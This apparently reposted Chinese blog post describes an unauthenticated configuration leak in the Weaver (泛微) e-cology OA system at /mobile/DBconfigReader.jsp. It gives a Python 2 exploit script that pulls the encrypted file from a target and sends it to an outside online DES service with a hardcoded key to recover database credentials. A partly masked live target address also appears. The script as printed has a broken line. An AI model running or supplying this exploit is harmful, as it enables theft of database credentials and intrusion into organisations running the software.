• 泛微ecology OA数据库配置信息泄露


    漏洞详情#

    泛微e-cology OA系统/mobile/DBconfigReader.jsp存在未授权访问,通过解密,可直接获取数据库配置信息。

    利用前提
    /mobile/DBconfigReader.jsp存在未授权访问。

    漏洞复现#

    利用github的exp报错,解密踩坑如下:

    1. 乱码,需要用b64加密后用密钥解密
    2. ,详见参考链接

    最终python脚本如下:

    import base64
    import requests
    import ast
    
    def req(url):
    	headers =  {
            'Content-Type':'application/x-www-form-urlencoded',
            'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
            'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
        }
    
    	r1 = requests.get(url,headers=headers).content
    	s = r1.replace('
    ','')
    	res1 = base64.b64encode(s)
    	
    	postdata = {
    		'data':res1,
    		'type':'des',
    		'arg':'m=ecb_pad=zero_p=1z2x3c4v_o=0_s=gb2312_t=1'
    	}
    	u = 'http://tool.chacuo.net/cryptdes'
    	r2 = requests.post(u,data=postdata,headers=headers).content	
    	res2 = ast.literal_eval(r2)
    	
    	return res2['data']
    
    url = 'http://58.2xxx:8888//mobile/DBconfigReader.jsp'
    print req(url)
    

      

  • 相关阅读:
    mock数据
    关于适配各种浏览器的图片预览。
    闭包
    兼容性 适配
    递归 使用callee
    webservice的model层命名空间不同的问题
    删除右键菜单中的Git
    windows server core 设置shell 及切换
    设置共享用户名密码
    Windows Remote Shell(WinRM)使用介绍
  • 原文地址:https://www.cnblogs.com/whoami101/p/13361254.html
Copyright © 2020-2023  润新知